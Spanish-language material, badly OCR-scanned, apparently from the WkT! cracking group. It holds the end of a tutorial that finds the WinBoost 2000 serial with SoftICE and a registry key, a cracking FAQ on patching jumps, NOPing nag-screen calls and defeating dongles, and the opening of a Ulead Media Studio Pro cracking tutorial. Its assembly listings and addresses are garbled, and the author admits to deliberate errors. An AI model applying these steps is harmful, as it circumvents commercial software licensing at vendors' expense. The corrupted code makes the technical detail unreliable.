Bien, despues de este estúpido inciso..... ¿cómo quitamos esa protección?. 
(Ya vas cargando otra vez el ProcDump) 


Pulsamos el boton Pe Editor y abrimos WB2000ecd.exe. Más botoncitos, pulsamos "Sections". Vaya 
una ventanita, para variar. :0) Pulsamos sobre "CODE" y le damos al boton derecho del raton. Nos sale 
un menu y seleccionamos "Edit section". Abajo, donde pone "Section Characteristics" vamos a 
modificar el valor CODOO040 por E0000020 , Pulsamos "ok", otra vez, otra vez y finalmente "EXIT". 
Desensamblamos.......... ¡1¡¡ BINGO!!! 


Ahora empieza lo interesante :0) 

Veamos, ¿por donde atacar? ¿recuerdas que no nos ha salido ningun mensaje de error al introducir 
nuestro fake serial?. Tsche!! "String References", ciertamente has acertado. Veamos si hay algo 
interesante que nos aproxime a nuestro ansiado Serial. 


Umm, encontramos una referencia a "Winboost 2000 has been registered succesfully" en :004C3325 


Si miramos un par de páginas hacia arriba nos encontraremos un monton de referencias a lo que 
parecen ser numeros de serie. ¿? Al llegar al final de los numeros vemos: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 


|1:004C35C8 (0) 

| 

:004C3185 8B45F4 mov eax, dword ptr [ebp-0C] 
:004C3188 SB55FO mov edx, dword ptr [ebp-10] 
:004C318B ES900CF4FF call 00403E20 

:004C3196 8B45FO mov eax, dword r [ebp-10] 
:004C3199 BA30364Cc00 mov edx, 004C3630 

:004C319E ES?DOCF4FF call 00403E20 

:D004C3143 0FS840c010000 je 004C32B5 

:004C3149 S8B45FO mov eax, dword ptr [ebp-10] 


* Possible StringData Ref from Code 0bj ->"417478292" 


He puesto el cursor en el salto que nos evita llegar a todos esos numeros de serie. Fijate en esa call 
justo anterior. 

:004C318B CALL 00403E20 La seguimos a ver donde nos lleva. Tiene toda la pinta de ser la que 
comprueba nuestro serial. 


:00403E20 53 push ebx 
:00403E21 56 push esi 
:00403E22 57 push edi 
:D00403E23 82906 mov esi, eax 
:D00403E25 82D? mov edi, edx 


:00403E29 0FS48FO000000 je O0403EBE Ñ 


Efectivamente, Si cargamos el Softlce Podremos observar que en :00403E27 CMP EAX, EDX se 
compara nuestro fake serial (guardado en EAX) con el verdadero numero de serie (en EDX), con solo 
escribir "d edx" en el softice veremos nuestro ansiado Serial. 

Ahora te preguntaras..... ¿como hago para que el Softlce se pare justo ahi? Si no me sale mensaje de 
error ni nada!!! Pues muy sencillo. 


Pero esto no era Shareware? 


Cargamos el winboost con el softice. Escribimos nuestro nombre y fake serial (no pulses el boton 
todavia). Pulsamos control+d y ponemos un breakpoint en hmemcpy Tal que asi: "BPX HMEMCPY" 
volvemos al winboost y ahora si que pulsamos el boton. Boom!! aterrizamos en el softice, pulsamos 
FS, F11 Y vamos pulsando F12 varias veces hasta llegar al codigo del winboost. Una vez en el, 
ponemos el "BPX 00403E20" . Cerramos el winboost, volvemos a cargarlo y choff, aterrizamos en el 
Softlce, justo antes de entrar en la call. Pulsamos F8 para entrar e ir traceando hasta llegar a la CMP 
EAX, EDX. 

Y el resto ya lo sabes. ¿no? :0) Estas hecho un fiera!! ;0) 


Estupendo, borramos todos los breakpoints con "BC *" salimos del softice y metemos el nuevo serial. 
Heeeeeey!! estupendo, era ese. (Pues claro, que te creias? jeje). Salimos del winboost y esta vez lo 
abrimos pero con el exe original , con el comprimido. Mec, ventanita de REGISTRADO. :0). Si 
monitoreas un segundito con el "Regmonitor” podras observar la ABSOLUTA ESTUPIDEZ DE 
ESTA PROTECCION. Si, lamentable, realmente lamentable. Nos hemos tirado un buen rato 
analizando este programa ¿para estoooo?? 


NOTA Para la gente de www.magellas.com: 


Tanta compresión y protección anti desensamblador para estoooo?? 
Señores, seamos serios. 
Se han dejado ustedes la puerta de atras completamente abierta!!!! 


Registro de Windows --STOP-- Imbecilidad Absoluta --STOP-- Para protegerlo asi mejor regalarlo -- 
STOP-- Aprendan Ingenieria Inversa y algo más --STOP-- 


[HKEY_LOCAL MACHINEANSoftwarelMagellassMWinBoost 2000] 
"Registered"="True" 


Siiiiii !!!! Acojonante!!! 

Todo el mecanismo de registro depende de si el programa encuentra esa 
clave en el registro. 

"Registered"="True" <---- Ni siquiera comprueba su valor, solamente 
que exista !!!!! 


Creo que no hace falta que te recuerde el propósito de estos 
tutoriales. ¿no? 


NOTA: Estos tutoriales pueden contener errores intencionados (puede 
ser que el autor se haya saltado la explicación de algún paso, 
errores en las direcciones de memoria...... etc). 

El objetivo es que aprendas a crackear y que tengas ideas propias. 
70) 
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Introducción 


Estas leyendo la FAQ Oficial de [Wk'T'!]. Este proyecto fue iniciado en su momento 
(1997) por Mr.Red [WkT!], y ahora volvemos a reabrirlo para deleite de todos 
nuestros lectores. La versión inglesa aún no esta disponible, y es posible que nunca 
llegue a ver la luz. A no ser que algún alma caritativa se ofrezca voluntaria a iniciar 
la traducción. Algún voluntario??? 

Si es así, por favor envianos un e-mail. 


Si tus dudas aún no están resueltas en esta FAQ, [WkT!] te recomienda que te pases 
por la Web de Gerza, donde encontrarás la FAQ Oficial del "Spanish 


ReverseEngineering Forum". 


Si alli tampoco encuentras lo que buscas, utiliza ese foro. 


¿Cual es el objetivo de [WkT!]? ¿Por que un grupo de crackers hispano? 
¿Qué es el Cracking? 

¿Qué es un debugger? 

¿Qué es un desensamblador? 

¿Qué es un editor hexadecimal? 

¿Todos los programas se desprotegen de la misma forma? 


¿Qué diferencias hay entre programas hechos en Visual C++ y Visual Basic? 
¿Cómo saber si un programa esta hecho en Visual Basic? 
¿Qué es una DLL? 


Pongo un break point en Winice y nunca para el programa en él 
Cuando paro un programa con Ctrl+D en Winice me aparece el listado en una zona llamada KERNEL32 


¿Cual es el objetivo de [WkT!]? ¿Por que un grupo de crackers hispano? 


Desde sus orígenes, el objetivo de Whiskey Kon Tekila ha sido, es y será siempre proporcionar información. Por 

iversos motivos (principalmente económicos) la Ingeniería Inversa siempre se ha considerado un tema "tabú" en 
d t (p palment ) la Ing I p h derad t "tabú" 
la Informática. Y como tal, el desconocimiento técnico en este sentido ha sido notable. 


(Al menos en el mundo hispano hablante). 


[WkT!] surge como un grupo de gente apasionada por la programación de protecciones hardware/software, con 
el único propósito de ampliar su conocimiento y el de cualquier otra persona interesada al respecto. Los 
programadores de aplicaciones comerciales suelen actuar con una cierta indiferencia cuando se trata de 
programar la protección de su software. Quizá sería más correcto afirmar que más que indiferencia se trata de 
inconsciencia. Desconocimiento, en definitiva, de las técnicas empleadas desde "el otro lado". 


Es por esto que estas páginas constituyen (o eso se pretende) un punto de referencia para todo aquel programador 
realmente interesado en ampliar sus conocimientos y adaptarlos a los nuevos tiempos. 

[WkT!] es consciente de que la información proporcionada en su Web Site puede llegar a ser un "arma de doble 
filo", puesto que nada impide el posible mal uso de esa información por parte de nuestros lectores. Ante esto 
cabría plantearse unas cuantas cuestiones: 


e ¿Hasta donde llega el conocimiento sobre Ingenieria Inversa del programador hispano? 
Cuando un programador desarrolla una protección.... ¿es consciente de sus limitaciones? 
¿Sabe cómo buscar sus puntos débiles? ¿Quiere realmente ELIMINAR esos puntos débiles? 

e El problema de la piratería de software .... ¿Es acaso una consecuencia de la sociedad consumista actual? 
¿0 se debe en mayor medida a los elevados precios del mismo? 

e ¿Por qué algunos de los mejores y tambien más caros programas son al mismo tiempo los que peores 
protecciones incorporan? ¿Hasta que punto preocupa la protección de su software a las grandes 
compañias? 

e Cuando alguien utiliza un crack... ¿Es porque quiere evaluarlo mejor antes de comprarlo? 

¿Lo hace porque no puede pagar el programa en cuestión? 
¿Lo hace porque no quiere pagarlo? Si es así.... ¿es consciente del daño que puede ocasionar? 

e Realmente, ¿Que deberia estar más sujeto a una "persecución social”? 

¿El uso ilegal de un programa o la programación / administración inadecuada e insegura del Software? 


Quizá estas sean algunas de las cuestiones más polémicas, pero que en definitiva nos hacen reflexionar a todos si 
el estudio de la Ingenieria Inversa deberia dejar de ser considerado como algo dañino e inapropiado para ser más 
tenido en cuenta a la hora de programar una aplicación comercial. Y es que, en definitiva, el mejor modo de 
avanzar en el conocimiento es investigar y para ello el primer paso es conocer nuestro propio software. Espero 
que esto te haya aclarado un poco la situación. De todas formas, gracias por haberlo leido. 

Un saludo. Mr.WhiTe [WkT!] 


|¿Qué es el Cracking? 


No tiene nada que ver con las drogras...(el famoso Crack) : ( 


"Crackear es el arte de reventar protecciones software/hardware con fines intelectuales, personales pero no 
lucrativos. Crackear también se llama "ingeniería inversa" (Reverse Engineering), ya que sin el programa fuente 
se es capaz de analizar el comportamiento del programa y modificarlo para tus intereses." 

Ref.- Como crackear por Estado Porcino. 


¿Qué es un debugger? 


Permite ver paso a paso (instrucción a instrucción) un programa mientras se está ejecutando en la memoria del 
ordenador. 

Las instrucciones se visualizan en ensamblador normalmente. Nos servira para ver como se comportan las rutinas 
de protección ya que son parte del programa. En el podremos cambiar instrucciones para comprobar y asi eludir 
las protecciones. Estos cambios no son permanentes en el fichero ejecutable. 


El mejor debugger es Softlce (Softice para Windows 95) http://www.numega.com 


Para MSDOS existe una versión Softice y otras versiones poco potentes llamadas DEBUG y SymDebug. 


|¿Qué es un desensamblador? 


Un desensamblador toma un fichero de instrucciones en hexa y lo convierte a lenguaje ensamblador. El lenguaje 
ensamblador, es el conjunto de sentencias que entiende el microprocesador 

(tu Pentium o mi 486). El procesador es el corazón del ordenador, todas las sentencias son ejecutadas por él y 
sólo por él. 

Por ejemplo un 43 en hexa se transforma en inc eax. Se necesitan algunos conocimientos de ensamblador pa esto 
de crackear. 

Nosotros usaremos el desensamblador para crakear con la técnica de la lista muerta... 

Ref.- Como crackear por Estado Porcino. 


|¿Qué es un editor hexadecimal? 


"Los programas no son más que un conjunto de instrucciones y cada instrucción no es más que un conjunto de 
bits, pero donde demonios se guardan esos bits?. Los bits del programa se localizan en los ficheros, p.e. las 
instrucciones del programa de compresión ar] se guardan en el fichero arj.exe. Hay algunos programas que no 
guardan todas sus instrucciones en único fichero, si no en varios, un ejemplo de esto son los programas que 
utilizan librerías dinámicas (o dll)." 


Un editor hexadecimal, no es más que un programa, que permite "editar" los ficheros de instrucciones de otros 
programas, osea, que permite ver,modificar,copiar,pegar... los bits de los programas. Para simplificar la cosa no 
se muestran los bits a pelo, sino que se muestran en hexadecimal, de ahí su nombre. 


Nosotros lo utilizaremos para alterar el comportamiento de los programas. Supongamos que conocemos la 
instrucción sentencia de la rutina de protección que debemos modificar, sea jz 23 y queremos modificarla por jnz 
23, bien como toda instrucción no es más que un conjunto de bits, sea 0110 para jz 23 y 1001 para jnz 23, sólo 
nos queda buscar estos bits dentro del fichero ejecutable del programa (que es, en general, el contiene las 
sentencias del programa). Como usamos un editor hexadecimal, debemos buscar la secuencia de un unos y ceros 
en hexa en el fichero del programa que queremos modificar. Si la secuencia que buscamos es muy común 
deberemos utilizar las instrucciones que se encuentran entorno a la instrucción a modificar. 


Esto es muy importante, sólo debe existir una localización del patrón de búsqueda en el fichero, si existe más de 
una, debemos añadir a la búsqueda las sentencias de alrededor, sino se corre el riego de modificar la sentencia 
equivocada, lo que provoca casi siempre un "cuelgue". 

Ref.- Como crackear por Estado Porcino. 


Uno de los más completos es UltraEdit-32 Professional http://www .uedit.com 


|¿Todos los programas se desprotegen de la misma forma? 


No... 
Un programa aún haciendo lo mismo puede programarse de mil formas... Esto se entiende en las protecciones del 
mismo modo (protecciones de numero de serie, etc..). 


Pueden existir miles de formas de proteger un programa, aún siendo el mismo tipo de protección. 
No obstante la "estupidez" de muchos programadores de pacotilla (aquellos que solo ven dinero en sus 
programas), y a la falta de imaginación de otros, hacen que la tarea de desproteger sea a veces muy sencilla. 


¿Qué diferencias hay entre programas hechos en Visual C++ y Visual Basic? 


La mayoría de las aplicaciones programadas mas profesionalmente para Windows 93 (requieren un conocimiento 
mas exhaustivo de programación) son las compiladas en C++... aparte de ser siempre las mas rápidas. 
De hecho Windows 953 está hecho prácticamente en C++... 


La diferencia entre Visual C++ y Visual Basic es la siguiente: 


Con Visual C++ somos como el director general de una oficina mientras que con Visual Basic somos los 
empleados (si entregamos un informe pasaremos por varios departamentos hasta que llegue al despacho del 
director general). 

E incluso no podremos hacer cosas que no pueda hacer el director general. Todo ese proceso interno de pasar de 
un departamento a otro lo realizan unas librerías que actúan mientras se ejecuta el programa (librerías Run-time). 
Estas son VBRUN300, VB40032, MSVBMS5O0 según sea la versión de Visual Basic. 


Desde el punto de vista de un cracker es mucho mas interesante un programa en C++... 

Los crackers suelen huir de programas hechos en Visual Basic, por lo incomodos y pesados que son y porque 
casi nunca aportan nada interesante que investigar. Aunque esto no significa que sean los mas dificiles de 
desproteger. 


¿Cómo saber si un programa esta hecho en Visual Basic? 


Existen muchas maneras, pero todas consisten en lo mismo. Hay que localizar referencias a varias librerias de 
ejecucion. Sus nombres son VBRUNxxx (xxx =100,200,300 para la versión 1,2 y 3 respectivamente), 
VB40032.DLL para la versión 4 del compilador de Visual Basic y MSVBM50.DLL para la versión 5. Las 
formas de localizarlas podrían ser: 


e Usar un editor hexadecimal con el fichero EXE a tratar y usar la opción de busqueda.... Ejemplos de 
texto a buscar: VBRUN300, VB40032, MSVBMS50 

e Usar un desensamblador (W32Dasm) con el archivo EXE y una vez desensamblado mirar al principio 
del listado en la zona de : 


PARA A A A A A 4444 IMPORTED FUNCTIONS 444444 A A A A A A A A A A + 
Number of Imported Modules = 1 (decimal) 


Import Module 001: MSVBVM50.DLL 


Aquí se observa una referencia a la libreria de ejecución de Visual Basic 5.0, con lo que este ejecutable está 
compilado con VBasic. 


|¿Qué es una DLL? 


Es una librería dinámica (Dynamic Link Library). Es un fichero en el que residen funciones(código ejecutable) o 
recursos (ventanas de un programa, menues, iconos, bitmaps, etc...) y que pueden ser llamadas por cualquier otro 
programa de Windows. Existen una gran variedad de DLL personalizadas y comerciales que permiten sacar 
partido a muchos programadores (Jscript.dll =librería de Java Script, TI32v20.d11 =Timelock, rutina de 
protección de programas en periodo de prueba, etc...). 

De hecho Windows 95 usa en su mayoria DLLs... KERNEL32.DLL, USER32.DLL, GDI32.DLL... 

Incluso los archivos DRV y FON (fuentes) son DLL, aunque estos se cargan de forma no automatica... 


¡Pongo un break point en Winice y nunca para el programa en él 


Hay muchas instrucciones de programas que nunca se ejecutan si no se dan las condiciones adecuadas... 
Siempre conviene estudiar un poco el ejecutable, o bien con la lista muerta o con el Winice. 
Poner en cualquier punto del programa un breakpoint no lleva a nada si no sabemos donde lo ponemos. 


¡Cuando paro un programa con Ctrl+D en Winice me aparece el listado en una zona llamada KERNEL32 


Esto es muy normal, teniendo en cuenta que Windows 93 usa internamente un API 
(Interfaz de Programación Avanzada) núcleo de sistema (Kernel) de 32 bits. 
El kernel32 es el minimo de código que necesita Windows93 para arrancar el sistema. 


También la mayoria de los programas suelen usar esta API para realizar operaciones basicas con sus funciones( 
uso de archivos, tareas, recursos, carga de librerías, uso de la memoria, etc..). Hay unas 780 funciones dentro de 
esta librería. 

Muchas rutinas de protección hacen uso de funciones de esa librería y de otra llamada USER32.DLL. 


Para nosotros el listado interno de estas librerias no interesa. Usaremos estas funciones como cajas tontas (solo 
interesará lo que nos muestre por fuera no como esté hecha por dentro). Es decir, si un programa usa la función 
GetComputerName (obtener el nombre de la computadora), solo nos interesará el nombre que la computadora, 
no como lo obtiene internamente. 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 
[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 
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Introducción 


Estas leyendo la FAQ Oficial de [Wk'T'!]. Este proyecto fue iniciado en su momento 
(1997) por Mr.Red [WkT!], y ahora volvemos a reabrirlo para deleite de todos 
nuestros lectores. La versión inglesa aún no esta disponible, y es posible que nunca 
llegue a ver la luz. A no ser que algún alma caritativa se ofrezca voluntaria a iniciar 
la traducción. Algún voluntario??? 

Si es así, por favor envianos un e-mail. 


Si tus dudas aún no están resueltas en esta FAQ, [WkT!] te recomienda que te pases 
por la Web de Gerza, donde encontrarás la FAQ Oficial del "Spanish 


ReverseEngineering Forum". 


Si alli tampoco encuentras lo que buscas, utiliza ese foro. 


Vi 


¿Por qué todos los crackers están contra Microsoft? 

¿Dónde puedo encontrar más información sobre "ingeniería inversa" 
(Reverse Engineering)? 

¿No me funciona un crack? 

¿Qué es un generador de claves (key generator)? 

¿Qué es Softice y Winice? 

¿Cómo puedo configurar el Softice o Winice para usarlo en nuestros asuntos? 
¿Qué es el ensamblador? 

¿Qué es un parche? 

¿Como se desprotegen las pastillas o mochilas (protección hardware)? 
¿Cómo se que es lo que tengo que cambiar para desproteger? 


|¿Por qué todos los crackers están contra Microsoft? 


Microsoft pretende imponer sus normas a todo el mundo. Aparte de crear un sistema operativo lleno de errores e 
inestable por todos los lados, hacen uso de estrategias de todo tipo para imponerse a todo el mundo sin importar 
como. 


Esto no significa que otra compañia sea la buena de la película... Limitan la capacidad de los usuarios a elegir su 
sistema operativo, navegador, etc... 


¿Dónde puedo encontrar más información sobre "ingeniería inversa” (Reverse Engineering)? 


El mejor sitio donde encontrar esa información es http://surf.to/fravia 


Recomendamos el uso del navegador Netscape ya que muchas páginas son Anti-Microsoft 
(Internet Explorer) Es un lugar que no hay que dudar en visitarlo... 


¿No me funciona un crack? 


¿Has probado a copiar el crack en el mismo directorio del ejecutable del programa a desproteger? 
¿Tienes una versión distinta? 
¿Te has leido el wkt.nfo que acompaña a todos nuestros cracks? 
Si la respuesta a las preguntas de arriba es Si y no va el crack... 
Pues que quieres que te diga... 

Buscate la vida... o aprende a crackear por ti mismo. 


Y recuerda, los cracks producidos por [WkK'T'!] tienen como única finalidad permitir una mejor evaluación del 
programa al que van destinados, así como enseñar las limitaciones de las protecciones empleadas. 

En ningún caso los cracks deben ser utilizados para evitar el pago del correspondiente programa. 

Si crees que un programador ha realizado una buena aplicación, que te es útil, que la usas y además está bien 
programada, entonces obra adecuadamente y recompénsalo registrándote. 

Nosotros no nos hacemos responsables de lo que tú hagas con nuestros cracks. 


|¿Qué es un generador de claves (key generator)? 


Es un programa que esta basado en un algoritmo de protección. 
El llegar a conocer este algoritmo, requiere un estudio avanzado de un programa. 
Permiten obtener el número de serie de un programa. 

Es una forma elegante de desprotección. 

A veces son muy complejos y otras veces son muy sencillos y simples. 


|¿Qué es Softice y Winice? 


Es el nombre de uno de los depuradores de código mas potentes que existen. El nombre se usa indistintamente 
para este depurador (debugger). Hay versiones para DOS y para Windows (Winice). El nombre mas usado es el 
de Softice tanto para DOS como para Windows. 


¿Cómo puedo configurar el Softice o Winice para usarlo en nuestros asuntos? 


Una manera de configurar Softice sería editar el archivo winice.dat (dentro del directorio de instalación del 
Softice). 

Cambiar las lineas siguientes: 

INIT=X;wl;wr;wd7;code on; 

HST=512 

A toda línea del tipo EXP=cWwindowsisystemisystem.drv , quítale el punto y como inicial. 

Siempre que un programa use una DIl especial, puedes añadirla en este archivo. 


Ref.- Como crackear por Estado Porcino. 


|¿Qué es el ensamblador? 


Es un tipo de lenguaje de programación (ensamblador, C++, Pascal, Cobol, Basic...). Es un lenguaje de bajo 
nivel. Esta formado por nemotécnicos de ingles (JMP ->proviene de JUMP, NOP ->No OPeration, MOV - 
>Move, etc..). 

Es de los lenguajes mas próximos a la CPU... 

Cada instrucción esta formada por una serie de bytes que hacen actuar a la CPU. 

Ejemplos de instrucciones: 


Byte(s) hexadecimal Instrucción ensamblador 
66 F7 C6 01 00 TEST S1,0001 
C3 RET 
90 NOP 
F3 A5 REPZ MOVSD 
Fc CLD 


Introducciendo en la CPU esta ristra de bytes (66 F7 C6 01 00 C3 90 F3 AS FC) se ejecutarán esas instrucciones. 
Por supuesto la CPU sabe separar instrucciones aparte de otras cosas... 


Este lenguaje posee mas de 100 instrucciones... y aprender este lenguaje nos ayudará a comprender los 
programas que queramos desproteger... 


|¿Qué es un parche? 


Es un cambio que se realizará en un programa para hacer que este se comporte como deseemos para siempre... 
Los cambios se realizan a nivel de bytes... ya que las instrucciones en ensamblador o cualquier dato siempre 
estarán formadas por bytes. 


¿Como se desprotegen las pastillas o mochilas (protección hardware)? 


Poniendo breakpoints en los puertos de impresora. bpio -h xxx -->>xxx=dirección de puerto de impresora 

bpio -h 378 

Existen varios tipos de protección... 

Hay pastillas que tienen parte del programa encriptado en su interior, con lo que es practicamente imposible de 
desproteger si no se tiene la pastilla. 

Hay otras pastillas que solo se usan como comprobación, con lo que la protección suele ser una chapuza y a 
veces es incluso mas facil que protecciones de numero de serie... 

(Nota a los programadores: es una tonteria que useis protecciones del segundo tipo, ahorraros el dinero o usar las 
del primer tipo... Aunque mejor seria bajar los precios al no tener que usar pastilla) 


¿Cómo se que es lo que tengo que cambiar para desproteger? 


Depende de la cantidad de bytes que tengamos que cambiar. 
O se tiene información de la codificación de instrucciones en ensamblador (paso de instrucción a bytes) o lo 
mejor es usar el Softice con el comando A cs:Xxxxxxxx (donde xxxxxxxx es la dirección donde está la 
instrucción a cambiar). 

Tecleamos la instrucción a cambiar y asi podremos obtener los bytes nuevos. 


ejemplo: 

13F :0000109B 74 07 JZ 10A4 <---instrucción a cambiar por JMP 10A4 
-A 13F:109B 

13F:109B_ JMP 10A4 

13F :0000109B EB 07 JMP 10A4 <---instrucción cambiada 


Normalmente se tienen pocos bytes para cambiar y conviene usar algunos trucos... 
Por ejemplo.- Asignar el registro EAX a 1 con la instrucción: 
(B8 01 00 00 00) MOV EAX,1 <----- (ocupa 5 bytes) 
ocupará mas bytes que usar las instrucciones 


(33 CO) XOR EAX, EAX <------ (ocupa 2 bytes, pone a cero EAX) 
(40) INCEAX <------ (ocupa 2 bytes, incrementa EAX). 
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FAQ 2 WKT Tutorialz Site FAQ 4 


Introducción 


Estas leyendo la FAQ Oficial de [WkT!]. Este proyecto fue iniciado en su momento 
(1997) por Mr.Red [WkT!], y ahora volvemos a reabrirlo para deleite de todos nuestros 
lectores. La versión inglesa aún no esta disponible, y es posible que nunca llegue a ver la 
luz. A no ser que algún alma caritativa se ofrezca voluntaria a iniciar la traducción. 
Algún voluntario???? 

Si es así, por favor envianos un e-mail. 


Si tus dudas aún no están resueltas en esta FAQ, [WkT!] te recomienda que te pases por 
la Web de Gerza, donde encontrarás la FAQ Oficial del "Spanish ReverseEngineering 


Forum". 
Si alli tampoco encuentras lo que buscas, utiliza ese foro. 


» 
Ven 


¿Qué es el Procdump? 

¿Cómo puedo saber si un programa está comprimido? 

¿Qué es la función Hmemcpy? 

¿Por qué a veces no puedo ver las "string references" cuando utilizo el W32Dasm? 
¿Qué significa "Crippleware"? 


¿Cómo puedo saber si un programa accede al registro del Windows? 
¿Cómo puedo saber si un programa accede a algún archivo? 

¿Cómo se puede "cazar" un serial en un programa escrito en Visual Basic? 
¿Qué es eso del "Color Crack" o "crack en colores"? 

¿Qué es una Nag Screen? ¿Cómo se puede eliminar? 


¿Qué es el Procdump? 


ProcDump es una herramienta que te permite (entre otras cosas) copiar el contenido de un proceso al disco duro. 
También te permite editar la cabecera de los programas de tipo PE (Portable Executable). 


¿Cómo puedo saber si un programa está comprimido? 


La mejor forma de averiguar si un programa está comprimido es utilizar alguna herramienta como el Gettyp. 
Es conveniente tenerlo siempre a mano, al igual que el Procdump (para descomprimir el programa en cuestión). 
Utilizando el Gettyp sabremos el tipo de compresor utilizado (Aspack, petite, upx....etc). 


¿Qué es la función Hmemcpy? 


HMEMCPY es una API de Windows, que utiliza la memoria RAM para leer, manipular, comparar y almacenar 
cadenas (texto que introducimos cuando un programa nos pide el numero de serie por ejemplo). La funcion recoge la 
informacion que le proporcionamos y la carga en memoria. Despues manipula esas cadenas, las mueve y las compara 
(por ejemplo compara tu numero de serie con el correcto), y despues decide si la cadena es o no la correcta. 

La funcion HMEMCPY devuelve esta informacion al programa en cuestion, y si has puesto el serial correcto te lo 
aceptara o de lo contrario te mostrara una bonita ventana de error. 

HMEMCPY se puede utilizar para "cazar" numeros de serie validos en programas shareware. Utilizando un debugger 
(depurador) como el Softlce, podemos poner un breakpoint en HMEMCPY para que el programa se pare y nos avise 
cuando llama a la funcion. Muchos programas shareware utilizan esta función para comparar numeros de serie, sobre 
todo cuando han sido escritos en Delphi o en Visual Basic. 


¿Por qué a veces no puedo ver las ''string references'' cuando utilizo el W32Dasm? 


Pues depende. En ocasiones se debe a que el programa tiene algún tipo de protección anti-desensamblado. 

Un ejemplo: En el caso del programa Winboost 2000 (Protección analizada por Mr.WhiTe, véase http://ecd.tsx.org) 
Sucede que al editar el *.exe (previamente descomprimido con el ProcDump) y seleccionar "Edit section". Abajo, 
donde pone "Section Characteristics" si modificamos el valor CODOO0040 por E0000020 y guardamos los cambios, la 
protección habrá desaparecido mágicamente. 


¿Qué significa "Crippleware''? 


Cuando un programa incorpora alguna de sus opciones deshabilitada (como por ejemplo guardar un archivo) 
existen dos posibilidades: 


e El código que hace funcionar esa función está presente en el programa pero no esta activada. 
e El código no esta presente en el programa. Entonces se dice que el programa es "Crippleware". 


Es posiblemente la mejor opción a la hora de proteger un programa. 
Es muchisimo más dificil que un Cracker consiga habilitar esa función (pero no imposible). 


¿Cómo puedo saber si un programa accede al registro del Windows? 
"Utilizando una herramienta llamada REGMON (Registry Monito 
¿Cómo puedo saber si un programa accede a algún archivo 
"Utilizando una herramienta llamada FILEMON (File Mori 
¿Cómo se puede "cazar" un serial en un programa escrito en Visual Basie? 


El Visual Basic no es precisamente el lenguaje más apropiado para programar una aplicación comercial. En el caso de 
toparnos con una de estas "joyas", una opción muy aconsejable es echar mano del Smartcheck de la empresa Numega 


¿Qué es eso del ''Color Crack' o "crack en colores''? 


Se trata de una "nueva" técnica de cracking empleada por Estado+Porcino. 
Es bastante útil cuando el mensaje de "error" no es una ventana sino una cadena dentro de una ventana. 
Debemos averiguar el color que se aplica al mensaje y colocar en el Softlce: 

bpx nombreRutina if (*(esp+8)==00BBGGRR) 

Recordad que los valores de Blue(azul), Green (Verde), Red (rojo) están en hexadecimal. 

Para más información véase el tutorial sobre el Multimedia Builder en http://ecd.tsx.org. 


¿Qué es una Nag Screen? ¿Cómo se puede eliminar? 


Una Nag Screen es una ventana que nos molesta durante la ejecución de un programa. Los motivos pueden ser muchos 
(Aparece al arrancar el programa recordandonos que no estamos registrados, nos informa de algo y nos obliga a esperar 
a que desaparezca, nos obliga a pulsar un botón para mandarla a paseo......etc) 

No existe ningún método estandar para crackear las Nags. Depende del programa y de la función utilizada para pintar la 
ventana. No es lo mismo el típico MessageBox con el botón de aceptar que otro con varios botones. Tambien hay que 
tener en cuenta si el programa realiza alguna modificación en la pila. Un par de ejemplos sencillos para entender "el 
concepto": 


Programa: Lotus SmartSuite Millenium Edition (Protección analizada por Mr.WhiTe) véase http://ecd.tsx.org. 

En este caso la ventana se presenta en pantalla haciendo uso de la función dialogboxparama. 

Nos aparecen varios botones. El que nos interesa pulsar es el botón de "Ok". ¿Soluciones? 

La mejor opción dadas las circunstancias será provocar que el programa pulse por si mismo el botón. 

¿Como conseguimos esto? 

Si pulsamos el boton "OK" nos devolvera el valor 10, así que en el momento de pasarle los parámetros a la función 
dialogboxparama, forzamos el programa a introducir el valor 10 en EAX. Para más información consulta la Win32 
Programmer's Reference 


Programa: Ulead Photolmpact v4.12 (Protección analizada por Mr.WhiTe) véase http://ecd.tsx.org. 


En este caso podemos saltarnos la molesta ventana simplemente evitando que el programa llame a la función 
DialogBoxParamA. Para ello sustituimos la llamada por unos cuantos bytes inofensivos: 


:4EB066CD FF15F4A3B14E Call dword ptr [4EB1A3F4] <--- Llamada a DialogBoxParamA 


: 4EB066CD 909090909090 NOP NOP NOP NOP NOP NOP <---— Código inofensivo 


Ojo: Esta opción no siempre es posible. En este caso sabemos que no sucedera ningún imprevisto porque el programa 
no realiza ninguna modificación en los valores almacenados en la Pila. 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


WKT Tutorialz Site 


L) 


Programa Ulead Media Studio Pro v5.01 | W9S5 / W98 / NT 


Se trata de una interesante suite de creación multimedia: 


Descripción : A ] 
P audio, dibujo, video... 


Tipo Trial de 30 dias 


Url http://www .ulead.com 


Protección Nag Screen. Time Limit 30 Dias 


Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 


Herramientas Softlce v3.25, Referencia API32 
Objetivo Conseguir que no caduque el programa y Eliminar una horrible X 
Cracker Estado+Porcino 


Fecha Septiembre de 1999 


VW 


INTRODUCCION Y AGRADECIMIENTOS DE Mr.WhiTe [WkT!] 


Hace ya algún tiempo cayó en mis manos este interesantisimo programa de Ulead, al cual obviamente 
no me pude resistir. Resultó un adversario bastante digno, quizá demasiado para mi estilo de cracking. 
Poco tiempo libre y alguna que otra neurona ausente por vacaciones. Así que tras docenas (no 
exagero, lo juro) de e-mails pidiendo como llorones que publicase un fix de mi crack evitando las 
dichosas X, me vi obligado a endosarle el muerto a otro. ¿Para qué estan los amigos? :0) 


Por lo tanto agradecimiento DOBLE para: 
Estado+Porcino y tambien para Mr.PinK [WkT!] que ha colaborado en este artículo. 
Que lo disfruteis. 


VI 


CAPITULO VII. Desclavando cruces con Jose de Arimatea. 


VIH 


DISCULPAS Y FELICITACIONES 


Whiskey Kon Tekita 


Saludos Familia. 
Cuanto tiempo, otra vez. 


EL escaso tiempo y la falta de protecciones realmente interesantes que caen en mis manazas 
ralentizan los nuevos capítulos. 


Primero mis felicitaciones al nuevo y excelente panorama crack español. Grupos como [WkT!], webs 
tan interesantes como las de ECD (Estudio Colectivo de Proteccciones) y foros de comunicación 
(http://disc.server.com/discussion.cgi?%id=23018) ponen en contacto a los excelentes crackers que 
existen en España. 

Felicitaciones a la Gorda por aguantarme tanto tiempo sin tararse :-) 


Os 
Vi 


UN PRIMER VISTAZO 


Echemos un vistazo a nuestro "niño" 
La proteccion tiene 2 niveles claramente identificados: 


1.- Proteccion Cinderella de 30 días. 
